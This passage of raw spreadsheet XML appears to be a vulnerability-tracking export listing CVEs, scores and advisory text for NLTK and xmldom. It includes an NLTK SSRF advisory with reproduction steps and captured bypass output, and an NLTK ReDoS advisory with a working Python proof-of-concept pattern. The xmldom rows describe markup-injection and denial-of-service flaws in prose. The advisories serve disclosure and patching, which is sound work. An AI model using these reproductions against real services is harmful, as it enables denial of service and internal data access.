Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).</t></is></c><c r="S21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D22" s="5" t="n"><v>8.699999999999999</v></c><c r="E22" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M22" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N22" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O22" s="5" t="inlineStr" /><c r="P22" s="5" t="inlineStr" /><c r="Q22" s="5" t="inlineStr"><is><t>CWE-441, CWE-918</t></is></c><c r="R22" s="5" t="inlineStr"><is><t>### Summary

Current NLTK source reopens SSRF in proxied environments. `pathsec.urlopen()` validates the requested hostname locally, but once proxy inheritance is enabled the real fetch is performed by the proxy rather than by the validated direct-connect socket path.

### Details

- **Vulnerability type:** Server-side request forgery
- **Affected component:** `nltk.pathsec.urlopen`, `nltk.data.load`, `nltk.downloader.Downloader.index`, `nltk.downloader.Downloader.download`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was a negative control and did not reproduce.
- **Patched versions:** Not yet patched
- **Root cause:** Proxy-handler inheritance disables `_SafeHTTPHandler` and `_SafeHTTPSHandler`, so the validated hostname no longer matches the actual egress destination.

The hardened direct path pins the validated numeric destination IP before opening the socket. The proxied branch instead copies `ProxyHandler` instances from the global opener, marks the request as proxied, and skips the pinned handlers. I confirmed that a validated public URL can be fetched from a loopback-only internal service through the proxy path via `pathsec.urlopen()`, `nltk.data.load()`, `Downloader.index()`, and `Downloader.download()`.

### PoC

**Preconditions**
- The runtime has an HTTP proxy configured and the caller relies on `pathsec` to keep network fetches SSRF-safe.

**Steps**
1. Start a loopback-only HTTP server that serves secret text, a valid downloader index, and a ZIP payload.
2. Configure a proxy that forwards a validated public URL to that internal loopback service.
3. Call `pathsec.urlopen()` or `nltk.data.load()` on the public URL and observe the internal response is returned.
4. Instantiate `Downloader(server_index_url=...)`, call `index()` and `download()`, and observe internal-only content is parsed and installed.

**Minimal reproducible excerpt**

```text
{'urlopen': 'PROXY_TEXT_SECRET', 'data_load': 'PROXY_TEXT_SECRET', 'downloaded_file': 'INTERNAL_ZIP_SECRET'}
```

### Impact

Consumers that trust `pathsec` as an SSRF barrier in proxied environments can be made to read internal-only HTTP resources, load forged downloader indexes, and install attacker-chosen package content fetched from the proxy's network view.

### Remediation

Preserve destination validation for the actual proxy egress target or fail closed when the request would otherwise downgrade into an unpinned proxied path. Add regression tests across `pathsec.urlopen`, `nltk.data.load`, and downloader fetches with a configured proxy.

### References

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L468-L518
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/data.py#L1247-L1283
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L875-L889
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L1220-L1226
- https://github.com/nltk/nltk/blob/3.9.4/nltk/pathsec.py#L245-L250

---

## Fix + attack demonstration (verified)


NLTK cannot pin the egress through a proxy, so it stops pretending to: under `ENFORCE` a proxied fetch is **refused** rather than performed unvalidated. Operators who trust their proxy opt back in with `NLTK_ALLOW_PROXIED_URLOPEN=1` or `nltk.pathsec.ALLOW_PROXIED_FETCH=True`; under `ENFORCE=False` the refusal degrades to a warning. This closes the **whole class** (environment proxies and explicit `ProxyHandler` alike), because NLTK declines any fetch whose egress it cannot validate.

## Attack demonstration (reproduced; captured output)
A loopback HTTP server stands in for the internal target; `http_proxy` points at it; NLTK is asked for a **public** IP URL.

**Before the fix** — the internal secret is exfiltrated through the proxy:
```
validate_network_url(public): PASSED
*** BYPASS: pathsec.urlopen returned INTERNAL content via proxy: 'INTERNAL_ONLY_SECRET'
```

**After the fix** — five scenarios, isolated subprocesses:
| Scenario | Result |
|---|---|
| proxied (env) + ENFORCE | `PermissionError` — **blocked** |
| proxied + opt-in | returns secret — escape hatch works |
| explicit `ProxyHandler` (not env) + ENFORCE | `PermissionError` — **blocked** (whole class) |
| no proxy (direct) | internal IP still refused — pinning intact |
| proxied + `ENFORCE=False` | returns secret **+ warns** |

## Tests
`nltk/test/unit/test_pathsec.py`: 64 passed. Added an end-to-end regression (`test_proxied_fetch_does_not_reach_internal_target`) plus `test_env_proxy_fails_closed_under_enforce`; the prior `test_env_proxy_skips_pinning_handlers` (which encoded the vulnerable path) is re-expressed as the opt-in case. Existing direct-path DNS-rebinding and IP-policy tests unchanged and passing. pre-commit (isort/black/ruff) clean.

## Note
The upfront `validate_network_url()` and the direct-path IP pinning (from the earlier DNS-rebinding fixes, CVE-2026-54296 / GHSA-qvv7) are unchanged — this only closes the proxied downgrade they didn't cover.</t></is></c><c r="S22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D23" s="5" t="n"><v>8.699999999999999</v></c><c r="E23" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.005</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M23" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N23" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O23" s="5" t="inlineStr" /><c r="P23" s="5" t="inlineStr" /><c r="Q23" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R23" s="5" t="inlineStr"><is><t>### Summary
NLTK's `Text.findall()` and `TokenSearcher.findall()` methods accept user-supplied regular expressions and pass them to the Python `re` engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the `nltk.text` module and was resolved in a prior commit.

### Affected Code
`nltk/text.py` — `TokenSearcher.findall()` (line 255) / `Text.findall()` (line 620)

`TokenSearcher.__init__` builds an internal string by wrapping each token in angle brackets. The `findall()` method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:

```python
def findall(self, regexp):
    # Preprocessing does NOT prevent catastrophic backtracking
    regexp = re.sub(r"\s", "", regexp)
    regexp = re.sub(r"&lt;", "(?:&lt;(?:", regexp)
    regexp = re.sub(r"&gt;", ")&gt;)", regexp)
    regexp = re.sub(r"(?&lt;!\\)\.", "[^&gt;]", regexp)

    # User-controlled regexp executed with no timeout
    hits = re.findall(regexp, self._raw)
```
The preprocessing transforms `&lt;` and `&gt;` angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.

### Proof of Concept
```python
import nltk
import time

# Token of 25 'a' characters produces self._raw = "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;"
# The trailing '!' ensures no match, forcing full backtracking.
text = nltk.Text(["a" * 25 + "!"])

# Pattern after transformation:
#   &lt;  →  (?:&lt;(?:
#   &gt;  →  )&gt;)
# Becomes: (?:&lt;(?:((a+)+)b)&gt;)
# re.findall runs this against "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;" — hangs.

start = time.time()
text.findall(r"&lt;((a+)+)b&gt;")   # Never returns
```

### Impact
Applications that expose `Text.findall()` to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.

### Remediation
This vulnerability was patched in commit `d8e4753`. Users should update to the patched version.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="S23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D24" s="5" t="n"><v>8.699999999999999</v></c><c r="E24" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.003</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr" /><c r="L24" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M24" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N24" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P24" s="5" t="inlineStr" /><c r="Q24" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R24" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Element.setAttribute() calls the private _createAttribute(name) path without validating the attribute name, while Document.createAttribute(name) validates against QName. XMLSerializer.serializeToString() emits attribute names verbatim, and requireWellFormed: true did not validate them, so a crafted name can terminate the intended attribute and inject additional attributes, including event handlers, into browser-consumed output; synthesized xmlns:PREFIX declarations expose the same unchecked-name boundary. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t></is></c><c r="S24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D25" s="5" t="n"><v>8.699999999999999</v></c><c r="E25" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.003</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr" /><c r="K25" s="5" t="inlineStr" /><c r="L25" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M25" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N25" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P25" s="5" t="inlineStr" /><c r="Q25" s="5" t="inlineStr"><is><t>CWE-1333, CWE-400</t></is></c><c r="R25" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.9 until 0.9.11, the processing-instruction production in lib/grammar.js lets the greedy S+ separator and lazy Char*? data group repeatedly repartition a long whitespace tail when the required closing ?&gt; is absent. Both parsePI and parseProcessingInstruction apply the expression to the entire remaining source, causing quadratic backtracking during DOMParser.parseFromString() under default options and allowing a small unauthenticated XML input to stall the Node.js event loop. This issue is fixed in @xmldom/xmldom version 0.9.11.</t></is></c><c r="S25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D26" s="5" t="n"><v>8.699999999999999</v></c><c r="E26" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.003</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr" /><c r="K26" s="5" t="inlineStr" /><c r="L26" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M26" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N26" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P26" s="5" t="inlineStr" /><c r="Q26" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R26" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Document.createElement(tagName) stores an unvalidated element name and XMLSerializer.serializeToString() emits that name verbatim. The requireWellFormed: true path did not validate the element qualified name or synthesized xmlns:PREFIX declaration, so attacker-controlled tag names could inject attributes, elements, or processing instructions into serialized XML or HTML and could cause cross-site scripting when browser-consumed. The unchecked values violate the XML QName constraint, and default serialization and creation-time createElement() behavior remain permissive. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t></is></c><c r="S26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D27" s="5" t="n"><v>8.699999999999999</v></c><c r="E27" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.003</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr" /><c r="K27" s="5" t="inlineStr" /><c r="L27" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M27" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N27" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P27" s="5" t="inlineStr" /><c r="Q27" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R27" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, the DOCUMENT_TYPE_NODE branch in lib/dom.js validates publicId, systemId, and internalSubset under requireWellFormed: true but emits DocumentType.name verbatim. A name containing &gt; or whitespace can terminate the &lt;!DOCTYPE ...&gt; declaration and inject sibling markup; the value can be supplied through createDocumentType() on the 0.8.x and unscoped lines or through a direct DocumentType.name property write on every affected line. The default path and legacy creation-time behavior remain permissive, while the vulnerable strict path fails to enforce an XML Name. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D28" s="5" t="n"><v>8.699999999999999</v></c><c r="E28" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.003</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M28" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N28" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P28" s="5" t="inlineStr" /><c r="Q28" s="5" t="inlineStr"><is><t>CWE-625, CWE-91</t></is></c><c r="R28" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0 until 0.9.12, the shared reg() builder in lib/grammar.js compiles the anchored QName_exact validator with the multiline flag, so ^ and $ validate only one line instead of the complete name. createElementNS, createAttributeNS, createDocumentType, and createAttribute consequently accept a malformed XML name whose first line is valid and whose later text injects markup when serialized through either the default path or requireWellFormed: true. The triggering ECMAScript line terminators are U+000A, U+000D, U+2028, and U+2029. This issue is fixed in @xmldom/xmldom version 0.9.12.</t></is></c><c r="S28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D29" s="5" t="n"><v>8.699999999999999</v></c><c r="E29" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.003</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr" /><c r="K29" s="5" t="inlineStr" /><c r="L29" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M29" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N29" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P29" s="5" t="inlineStr" /><c r="Q29" s="5" t="inlineStr"><is><t>CWE-178, CWE-400</t></is></c><c r="R29" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.1 until 0.9.12, HTML-mode parsing through DOMParser.parseFromString() mishandles a mixed-case closing tag for the script, style, textarea, or title raw-text elements. parseHtmlSpecialContent, selected by isHTMLRawTextElement or isHTMLEscapableRawTextElement, uses a case-sensitive indexOf() and then calls substring() with a missing-close result of negative one, causing unstable parser progression and quadratic output amplification. A small untrusted text/html document can consequently consume disproportionate CPU and memory when parsed and serialized. This issue is fixed in @xmldom/xmldom version 0.9.12.</t></is></c><c r="S29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D30" s="5" t="n"><v>8.699999999999999</v></c><c r="E30" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.003</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M30" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N30" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P30" s="5" t="inlineStr" /><c r="Q30" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R30" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMHandler.startElement in lib/dom-parser.js inserts every parsed attribute through setAttributeNode, while NamedNodeMap.setNamedItem in lib/dom.js calls the linear getNamedItem or getNamedItemNS lookup for each insertion. A well-formed element with many distinct attributes therefore requires quadratic comparisons during DOMParser.parseFromString() and can stall a Node.js event loop before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D31" s="5" t="n"><v>8.699999999999999</v></c><c r="E31" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.004</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr" /><c r="K31" s="5" t="inlineStr" /><c r="L31" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M31" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N31" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P31" s="5" t="inlineStr" /><c r="Q31" s="5" t="inlineStr"><is><t>CWE-400, CWE-407</t></is></c><c r="R31" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.3.0 through 0.6.0, two independent quadratic paths can cause denial of service. In lib/sax.js, parseElementStartPart repeatedly rescans a malformed tag name to the next &gt; during single-character recovery; in lib/dom.js, normalize() repeatedly removes and appends adjacent text nodes, causing quadratic reindexing and string rebuilding. The first path is reachable through default DOMParser.parseFromString() processing, while the second is also reachable through a direct normalize() call on a programmatically constructed DOM, and endDocument invokes that normalization after parsing. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D32" s="5" t="n"><v>8.699999999999999</v></c><c r="E32" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.004</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M32" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N32" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P32" s="5" t="inlineStr" /><c r="Q32" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R32" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.1.5 through 0.6.0, appendElement in lib/sax.js uses _copy to clone the complete currentNSMap for each nested element that declares a new namespace prefix. Keeping every ancestor map live on the parse stack creates quadratic peak namespace-map storage, so a small highly compressible XML document can exhaust the process heap before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D33" s="5" t="n"><v>8.699999999999999</v></c><c r="E33" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.003</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr" /><c r="K33" s="5" t="inlineStr" /><c r="L33" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M33" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N33" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P33" s="5" t="inlineStr" /><c r="Q33" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R33" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createProcessingInstruction(target, data) in lib/dom.js accepts an unvalidated target, while the requireWellFormed: true serializer checks only for a colon and the reserved case-insensitive xml name on 0.9.x and performs no target check on 0.8.x. Because serialization emits &lt;?target data?&gt;, a target containing &gt;, ?, whitespace, or another invalid XML-name character can break the processing-instruction boundary and inject XML structure. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D34" s="5" t="n"><v>8.699999999999999</v></c><c r="E34" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.003</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M34" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N34" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P34" s="5" t="inlineStr" /><c r="Q34" s="5" t="inlineStr"><is><t>CWE-625, CWE-91</t></is></c><c r="R34" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.11 until 0.9.12, the requireWellFormed: true element and attribute name checks use the anchored QName_exact expression produced by reg() in lib/grammar.js, which inherits the multiline flag. A name with a valid first line followed by U+000A, U+000D, U+2028, or U+2029 and breakout markup therefore passes validation and is emitted verbatim in element start and end tags or attribute names. This bypasses the strict-serialization checks introduced for the earlier element-name and attribute-name injection advisories, while the default serialization path remains outside the strict guarantee. This issue is fixed in @xmldom/xmldom version 0.9.12.</t></is></c><c r="S34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D35" s="5" t="n"><v>8.699999999999999</v></c><c r="E35" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.003</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr" /><c r="K35" s="5" t="inlineStr" /><c r="L35" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M35" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N35" s="5" 